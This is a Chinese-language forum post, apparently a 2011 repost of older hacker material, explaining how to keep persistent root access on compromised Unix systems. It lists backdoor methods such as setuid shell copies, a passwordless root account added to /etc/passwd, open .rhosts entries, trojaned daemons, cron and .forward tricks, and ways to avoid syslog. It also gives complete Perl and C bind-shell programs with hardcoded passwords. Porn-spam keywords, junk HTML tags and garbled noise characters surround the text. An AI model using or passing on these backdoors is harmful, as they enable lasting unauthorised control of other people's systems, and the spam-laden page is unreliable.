亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

<address id="xly8e"><var id="xly8e"><center id="xly8e"></center></var></address>

<kbd id="xly8e"><dl id="xly8e"></dl></kbd>

<bdo id="xly8e"><mark id="xly8e"><legend id="xly8e"></legend></mark></bdo>

<span id="xly8e"><delect id="xly8e"></delect></span>

<dfn id="ewe9c"><td id="ewe9c"><table id="ewe9c"></table></td></dfn>

<ul id="ewe9c"><td id="ewe9c"></td></ul>

<dfn id="ewe9c"><td id="ewe9c"></td></dfn>

汶上信息港

標(biāo)題: 如何創(chuàng)建后門 [打印本頁(yè)]

---

作者: 雜七雜八    時(shí)間: 2011-1-13 17:04
標(biāo)題: 如何創(chuàng)建后門
參考文獻(xiàn)：
% O+ W% p+ s/ |6 h! yArticle: backdoor from The Infinity Concept Issue II
Src: b4b0.c by b4b0
; A% _! T. ^- {. x# Y% {4 JSrc: daemonsh.pl by van Hauser / [THC] in 1997'
" g; x' e. u% x# K$ Y0 n
--

千辛萬(wàn)苦（or 輕而易舉）的取得root后，當(dāng)然希望長(zhǎng)久的保持. 以被以后用來。。。d0ing what u want t0 d0 :) 傳統(tǒng)的方法就是建立一個(gè)后門(backd00r).即使入侵被發(fā)現(xiàn)，好 的（先進(jìn)）后門仍然能夠使你再次輕松的破門而入 -- 請(qǐng)記?。?" we come back and we are the h.a.c.k.e.r "
6 K5 y& h* K& W--
創(chuàng)建后門的方法如下：
-
7 y6 i" ^9 c- H$ n7 L1. setuid
% E2 r$ @$ c2 {- F#cp /bin/sh /tmp/.backdoor
) x( V7 n9 X: p6 @/ X! O7 ~3 A#chmod u+s /tmp/.backdoor
; |* v  H9 u/ Q7 ?9 [1 _0 w加上 suid 位到shell 上，最為簡(jiǎn)單方便，但也最為容易被ADM 發(fā)現(xiàn) find / -perm 4000 -print;同時(shí)在大多數(shù)的SUNOS 上 你會(huì)發(fā)現(xiàn)不能setuid。-- 適用于新手；
' M8 n3 V( q- d7 n# P# l-
2. echo "zer9::0:0::/:/bin/csh" >> /etc/passwd 即給系統(tǒng)增加一個(gè) id 為 0（root)的帳號(hào)，無(wú)口令； 也很容易被發(fā)現(xiàn)。 -- 適用于新手；
-
; |8 ?: f( t! X6 T3.echo "+ zer9">>/.rhosts
0 r5 g: V' V% h  [2 o+ P  A即本地的名為 zer9 的用戶可以直接 rlogin target 無(wú)須口令此時(shí)的 zer9 就相當(dāng)于口令，不知道的人是不能進(jìn)去的.
! t6 C. X* N& I6 ~& o4 k5 t前提是目標(biāo)的port 512or513or514 opening.
注： 如 echo "+ +">>/.rhosts 則任何用戶都可rlogin至目標(biāo) 導(dǎo)致目標(biāo)門戶打開，最好不要；
還可 echo "+ +">>/etc/hosts.equiv 但這樣不能取得root權(quán)限；-- 適用于比新手高一點(diǎn)點(diǎn),比中級(jí)水平低一點(diǎn)點(diǎn)的guys;
: e4 g% d! p% T% h8 e# b-
0 ~; B7 x2 j- t) @5 a  p5 Z4.modify sendmail.cf 增加一個(gè)"wiz" 命令;
3 f( U7 s6 K. r5 z) y3 d3 Tusage:
8 i' g. H3 s% \5 atelnet target 25 [enter]
wiz[enter]
這是我從SAFEsuite中學(xué)到的（但沒試過）；比較危險(xiǎn)。因?yàn)閹缀跛械膾呙杵鞫紩?huì)刺探本漏洞。不過你可把命令本身該成其他不易猜到的名字。比較復(fù)雜，危險(xiǎn)，但ADM不易發(fā)現(xiàn)，隱蔽性較強(qiáng)；你只在你的機(jī)器上試一試就okay了；-- 顧名思意，大師級(jí)漏洞；
" N0 N' W# v1 @+ b3 }& `3 q/ q-
/ Y' J+ O+ q' o- _0 M5. crack suck as inetd,login,...
7 _2 r- e% F. b即安裝它們的特絡(luò)繹版本。你需要找到各版本unix的rootkit;然后分別編譯即可；-- 如果目標(biāo)機(jī)上沒有安裝 tripwire之類的東東，那幾乎不可能被發(fā)現(xiàn)。linux&sunos&freebsd的可能好找，但其他的了？即使你找到了，你有對(duì)應(yīng)平臺(tái)上的編譯器嗎？我有一臺(tái)運(yùn)行 slackware,one running irix,one runningsunos,one running hpux,one running digits unix,...
- ]/ _" n# v- u. h: P9 a' E5 Dhahhahha,我又做夢(mèng)了:)
-- 我個(gè)人認(rèn)為是最好的方法，但實(shí)現(xiàn)起來有一定風(fēng)險(xiǎn)，你必須考慮到如果你的木馬運(yùn)行出錯(cuò)怎么辦--因?yàn)槲覀兯龅囊磺卸急仨氁圆黄茐哪繕?biāo)機(jī)上的任何數(shù)據(jù)為原則；
4 m. m( [( j$ B& H/ l7 _-
8 a" I4 _2 J7 q% }/ w# `0 M' F6.ping rem0te backd00r
即使是防火墻也很少阻止 ICMP 的通過，因此本后門可繞過防火墻。具體的程序你可在 [THC] 的主頁(yè)發(fā)現(xiàn)；我想到了另外一種直接用ping命令實(shí)現(xiàn)的可通過防火墻的方法 ：一方在防火墻內(nèi)，一方在防火墻外；除 ICMP 外；通向防火墻內(nèi)的信息均被過濾掉 ：(用 60k data 代表長(zhǎng),10k data 代表短；使用摩爾思編碼；（或其他自定義編碼）雙方通過 ICMPinfo 接受信息（ping 's data length)；“嘀，嘀,嘀嘀,嘀,嘀嘀嘀...""長(zhǎng)江長(zhǎng)江，我是黃河--- 向我開炮！向我開炮”(^o^);以后有時(shí)間我會(huì)通過程序來實(shí)現(xiàn)驗(yàn)證可行性的。(技術(shù)上應(yīng)該沒有什么難度）
-
7.rem0te shell
我最喜歡的方式。而且由于繞開了login,故用 who 無(wú)法看到--也就是說，避開了utmp&utmpx&wtmp&wtmpx;但沒有完全避開 syslogd.ADM仍可以在/var/log/messages中發(fā)現(xiàn)
你。不過，有一種方法可以徹底完全的旁路 syslogd!且聽下面一一道來.
* ]) E% S! c3 K2 H) }9 q) C7 \, abindshell的實(shí)現(xiàn)有兩種：
$ K( K0 P9 {, n9 ba.
) j5 ~7 {) @% \$ |/ ~替換掉 inetd.conf 中的不重要服務(wù)，如 rlogind :)在inetd 接受 connect 請(qǐng)求后,直接在本端口利用 system("/bin/csh -i");直接spam 出一個(gè)shell，
b. 接受 connect 后，在高端spam出一個(gè)shell;
（更安全 ：）
  A1 a! A- h, H# q) ~下面我給出一個(gè)perl 實(shí)現(xiàn)（不需socket libary支持）(pass on sunos5.5.1&slackware 2.0.33&irix6.4&hpux10.2)和一個(gè) gnuc 的實(shí)現(xiàn)（test on slackware 2.0.33&irix6.4)
- R* R; _) }$ E* T) J---
& |- ~) w8 [# j7 [. j+ }perl 版安裝方法：
  \9 t+ N- N% {7 S###無(wú)須編譯??！只要目標(biāo)機(jī)上有perl支持就okay!
, L0 ]2 @, K2 S0 Y; O  X" y! O& t  z如何判斷有無(wú)perl: $/>perl [enter]
. {8 d) j. T9 `7 B
[ctrl-c]
$/>
2 `) w  L) V' R: f  N-
- k  O# L1 w' K+ J5 x5 F& x如果你對(duì) /etc/inetd.conf 中的內(nèi)容不是很熟的話,下面
: }0 l1 B! V& ~. s的方法有很大的危險(xiǎn)性, exit(-1) please;
2 P; i+ ?6 f6 i-
) h1 H4 Y! V* q  _2 K; X: @& T首先將源程序cut，存為你想要替換的daemon,如in.rexecd or or in.rlogind ,in.pop2d....最好是已經(jīng)被ADM關(guān)掉了，而且不太引人注目的daemon,注意，一定要是 TCP types.然后
mv /usr/sbin/in.rexecd /usr/sbin/in.rexecd.bak :))
; `2 ~) p5 n% m; s* [: Ocp in.rexecd /usr/sbin/in.rexecd
然后 ps -aux|grep inetd;kill -HUP id(by inetd);
okay! 連 /etc/inetd.conf 都不要改。重申一點(diǎn)：不論在任何情況下，我們都要盡最大的可能保護(hù)數(shù)據(jù)！
-
& _9 F2 C' {# `6 L8 s$ p# G! r0 t! YUsage: nc target (such as 512)
9 ^- N# W) ]; v/ \# _# p[enter]
ur passwd [enter]
(then u login in...:)

; u1 b/ [. |8 X) K3 `----Cut Here------------------------------------------
8 J* m( i- E+ d
#!/usr/bin/perl
2 A8 H& E; S# e7 F* _- k0 X; j% y#
, r* m4 w* b: h1 p# _# BEST
# SIMPLE
0 q' y2 G; s( N% B# rem0te bind shell
# ?; L, g, i. S3 v; h# ?& P#[perl version only tcp]
, }. k- z$ s" R% r( S: h# by
# zer9[FTT]
: X, i- Z" X- m! e6 c. ]# zer9@21cn.com
, b: @# W3 t) w' j6 H, o#passed on allmost unix
9 R+ R! x2 {$ F! ^#greet to:van Hauser/[THC]
# for his daemonshell.pl
6 A( e  y9 I! `* V#
) D; Q, w4 s% _: B- k" z4 A  d( f$SHELL="/bin/csh -i";
#d3f4ult p4sswd 1s "wh04r3u" (no quote);
8 s, _5 d' e9 U' w8 x4 h5 i9 ?5 H$ j$PASSWORD="BifqmATb6D5so";
8 c$ C) _6 h, j& V  ~0 z
if ($PASSWORD) {
chop($pass=);
' }- d: F# t( c3 C  jif (crypt($pass, $PASSWORD) ne $PASSWORD) {
! j. _) O# |& zexit 0;
2 K1 t$ j4 ~) G# _/ c/ q) i+ A}
% t+ m" W2 q( A; Iexec $SHELL ;
exit 0;
3 l8 W# o6 Y# t- S3 m. Q6 H- @- x}

" x" H8 E$ _9 G----Cut Here--------------------------------------------



* d6 {8 P; d; x& _8 Q: _# L4 P
下面是一個(gè)for gnuc 的bindshell,first cut it,save as
backdoor.c ,then cc backdoor.c -o backdoor
# K, H( \8 f* T" h4 K$ qother action just l1ke before;
# R7 v6 j& {5 m9 ^) tUsage: (exp:binding to in.rlogind (513))
' }' R  q2 o' ]" ~- B; [2 inc target 513 //spam a shell on the high port;
# M) b7 R5 Y; a4 Y% o0 Inc target 54321
ur passwd
(then u coming in...)

' x, R2 p: t  y  q; u
, Z8 r9 k( T5 q: o! O! ^5 r8 k4 j----Cut Here-------------------------------------

/*
6 q' `7 {! q  a. ?' |* [ b i n d - s h e l l ]
* by
* zer9[FTT]
5 ^& U& P/ t; I. p+ Q* zer9@21cn.com
*test on slackware 2.0.33&irix6.4(cc)
*cc backdoor.c -o backdoor
*u c4n p01nt t0 wh1ch p0rt th3 sh3ll t0 sp4m
*c0mm4nd l1n3: backdoor [port]
# b; s1 u) ]  z* B/ {9 e8 E3 y1 i*d3fault p0rt 1s: 54321
9 d/ X1 M9 P$ n" c( k9 [! a*greets to b4b0 for his b4b0.c
*m4yb3 1 c0uld s4y:
. ?1 o- w9 R9 {# k$ W' N3 g*"0k,b4b0.l1st3n c4r3fully;"
6 V+ O) F/ ^9 v3 E' ?5 ~: N8 ]- {*s0rry,just a joke.
) ]/ D3 F/ G2 O8 A3 Y" h5 Z, Q# `*
) \% i  d) r- u1 }/ e+ H7 L3 C2 t: V*/
2 A; k% I: y6 T" J5 s- t
#include
#include
#include
+ t# q, {9 A$ W" i9 m$ v9 `#include
$ |5 t! D$ J/ x/ z5 M! V; m#include
#include
. w0 U' e7 i' e( A  v) R( P- d/ e#include

) L: @1 c' Q  L: g
#define PassWord "k1n90fth3w0rld"
/* u c4n us3 crypt l1b4ry t0 sh4d0w 1t */

6 G% N7 l& S# o#define DefaultPort 54321
8 d$ O  z4 q- G' p/* d3f4ult b1nd1ng p0rt */

int main(int argc,char **argv)
{
) \. Q- @! l5 X1 Kint s,in_s;
$ Z/ ?$ V% p: Ystruct sockaddr_in server,client;
! C  D$ p8 p# G/ v  h4 m, [- pint client_len,bindport;
8 P# t& p" {2 R7 J" bchar recvbuf[1000];

if(argc!=2) bindport=DefaultPort;
else
bindport=atoi(argv[1]);
if((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
: U# r+ F' E  \# ]2 \perror("socket");
- o: S2 t% k3 sreturn -1;
}
. @) ]( A4 `8 {0 Mbzero((char *)&server,sizeof(server));
bzero((char *)&client,sizeof(client));
bzero(recvbuf,sizeof(recvbuf));
0 Z2 [, b: ^! O+ z, O; g8 J7 Xserver.sin_family=AF_INET;
4 Z1 h# ^" _9 k; gserver.sin_port=htons(bindport);
2 [. m1 s) g8 m& @2 Gserver.sin_addr.s_addr=INADDR_ANY;
if(bind(s,(struct sockaddr *)&server,sizeof(server))<0)
{
, r3 b  i8 Z& c1 A" Qperror("bind");
return -1;
}
if(listen(s,3)!=0)
{
perror("listen");
2 W4 r: F1 r1 R! ureturn -1;
}
; Q+ k2 }# k1 D' \) X- sclient_len=sizeof(client);
) ?5 T5 M# l7 Xif((in_s=accept(s,(struct sockaddr *)&client,&client_len))<0)
{
perror("accept");
return -1;
}
recv(in_s,recvbuf,sizeof(recvbuf),0);
# }' ?& K* P+ P4 V5 H6 D1 f% `* q6 j; I9 vsleep(1);
+ O5 a* J/ R8 H5 }2 k3 Uif((strlen(recvbuf)-1)==strlen(PassWord))
if(!strncmp(recvbuf,PassWord,strlen(PassWord)))
{
. _0 k) h2 R6 Ssend(in_s,"0k4y! c0m1ng 1n...\n",25,0);
close(0);close(1);close(2);
4 Z7 A. k& r( z8 Pdup2(in_s,0);dup2(in_s,1);dup2(in_s,2);
9 N0 ~6 z3 W' w' c) n9 ^% Rexecl("/bin/csh","/bin/csh",(char *)0);
}
close(s);
close(in_s);
return 0;
}

----Cut Here-------------------------------------------------

$ j, G* r# P7 T  R' ]用上面的方法都不能完全的避開syslogd,因?yàn)樗麄兌际怯蒳netd 啟動(dòng)的，inetd啟動(dòng)它們的同時(shí)已經(jīng)進(jìn)行l(wèi)og 了;旁路掉inetd就能完全避開syslog!方法很簡(jiǎn)單，只要直接在命令行直接啟動(dòng)例程2(c)就可以了，（1perl不行）;不過這樣很麻煩；一旦ADM關(guān)掉計(jì)算機(jī)就玩完了；比較好的方法是在 /etc/rc.d/rc.local中加入：
backdoor &
5 J; k" ^. y. {/ l& [! }但即使這樣作了，每次用過后還要再起動(dòng)一次；更好的方法是寫一個(gè)具有完全功能(后門功能^o^）的daemon,徹底的解決這個(gè)問題；但這樣做與hack inetd 那樣更有效率（安全）了？
0 |- _. b. @5 s! l$ x# F6 Y% q& U, n--
8.第八種武器就是 crontab
我只知道原理，沒實(shí)踐過.每到一定時(shí)間就往 /etc/passwd 中加入一條uid為0（root）
的用戶；時(shí)間一道就delete ,或創(chuàng)建suid's shell...在序言中提到的文章中有詳細(xì)介紹；
--
- M& K0 Q# {2 A# V9.有沒有想過只要向系統(tǒng)的一個(gè)用戶發(fā)一個(gè)email,OS 就會(huì)spam出一個(gè)shell?利用用戶的home目錄下的 .forward 可作到這一點(diǎn)。
--
10。修改內(nèi)核--超級(jí)高手的做法；2.2.0的解壓文件達(dá)到了50幾MB,看到就頭痛。接著就 jmp ffff0 :) (不是看到內(nèi)容，而是看到大?。?[THC]最近出了篇文章關(guān)于這個(gè)的。你對(duì)自己有信心的話可以看看；
--
11.還有就是利用 overflow 程序，雖然我們一般是利用它取得root;但只要 ADM && u 沒有 patch ,始終我們可以利用它的，與suid不同的是它不怕被 find / -perm 4000 發(fā)現(xiàn)；一般只有 tripwire可發(fā)現(xiàn)。
/ ?( I3 c! U$ i# {( v" P3 p5 K( Q; H3 W* }
' ?7 ?# f5 ]9 ?: C; ?1 H* |

---

歡迎光臨 汶上信息港 (http://m.loveproblemguru.com/)

Powered by Discuz! X3.5

亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

<address id="xly8e"><var id="xly8e"><center id="xly8e"></center></var></address>

<kbd id="xly8e"><dl id="xly8e"></dl></kbd>

<bdo id="xly8e"><mark id="xly8e"><legend id="xly8e"></legend></mark></bdo>

<span id="xly8e"><delect id="xly8e"></delect></span>

91免费国频在线看 欧美精品v国产精品v竹菊影视 午夜福利yw在线观看2020 日本午夜福利在线观看 欧美BT亚洲BT日韩BT

<dfn id="4zwvh"><span id="4zwvh"></span></dfn>